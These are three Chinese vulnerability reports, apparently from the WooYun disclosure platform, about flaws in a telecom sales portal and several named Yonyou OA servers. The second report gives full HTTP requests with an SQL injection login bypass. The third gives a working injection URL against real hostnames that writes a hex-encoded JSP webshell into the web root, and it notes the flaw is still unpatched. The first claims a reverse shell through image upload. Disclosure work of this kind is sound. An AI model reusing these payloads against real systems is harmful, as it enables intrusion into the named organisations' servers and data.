漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：rt详细说明：注册后上传图片，直接poc，成功反弹 漏洞证明：注册后上传图片，直接poc，成功反弹 修复方案： 版权声明：转载请注明来源 凌零1@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-05 21:57厂商回复：感谢您的反馈，我们已经跟进最新状态：暂无

漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：RT详细说明：问题出在这个地址：**.**.**.**:9988/第一处是登录接口：code 区域POST /userLogin.do?method=login HTTP/1.1 Host: **.**.**.**:9988 Proxy-Connection: keep-alive Content-Length: 83 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: **.**.**.**:9988 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: **.**.**.**:9988/login.html?msg=%25E7%2594%25A8%25E6%2588%25B7%25E5%2590%258D%25E6%2588%2596%25E5%25AF%2586%25E7%25A0%2581%25E9%2594%2599%25E8%25AF%25AF%25EF%25BC%2581 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: JSESSIONID=B3C2A0D5A059FE7F19BCE2C0FD8E4370; email=13888888888; password=13888888888; isstorePwd=yes username=13888888888' or '1'='1&password=13888888888' or '1'='1绕过验证且存在sql注入问题。第二处是：发送短信接口code 区域POST /sellMain.do?method=sendmsg HTTP/1.1 Host: **.**.**.**:9988 Proxy-Connection: keep-alive Content-Length: 24 Accept: text/plain, */*; q=0.01 Origin: http://**.**.**.**:9988 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://**.**.**.**:9988/openOrder.html?id=8a5f82ca4f825e83014f82cd61440004&phone= Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: email=13339718222; password=111111; isstorePwd=no; JSESSIONID=2948C8DADD9D0F7FFD4B4FFC307A1800 phone=13339718222有没有大牛知道如何利用万能密码控制登录用户的。。我觉得应该可以做到。。求教！漏洞证明： 然后可以利用短信接口给所有联通用户发流量包短信。。修复方案：过滤版权声明：转载请注明来源 SoulHunter@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-06 17:30厂商回复：CNVD未复现所述情况，暂未列入处置流程。最新状态：暂无

漏洞详情披露状态： 2016-05-10： 细节已通知厂商并且等待厂商处理中2016-05-11： 厂商已经确认，细节仅向厂商公开2016-05-21： 细节向核心白帽子及相关领域专家公开2016-05-31： 细节向普通白帽子公开2016-06-10： 细节向实习白帽子公开2016-06-25： 细节向公众公开简要描述：又学到了一点新姿势，问题是只修复了提权，注入漏洞并没有修复。详细说明：http://a6.gykghn.com:8080/yyoa/index.jsp 湖南分公司http://oa.sinopharm-fj.com:8080/yyoa 福建分公司http://oa.gykgnmg.com/yyoa 内蒙古分公司以湖南分公司为例先读取数据库目录然后尝试拼接写网站目录可以读取，然后直接上传文件写入shellhttp://a6.gykghn.com:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex%28%273C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%27%29%20%20into%20outfile%20%27D:/UFseeyon/OA/tomcat/webapps/yyoa/sky123.jsp%27再通过本地构造上传成功上传大马是管理员权限 漏洞证明：    修复方案：继续修复吧版权声明：转载请注明来源 sky666@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-11 08:43厂商回复：我们会尽快修复最新状态：暂无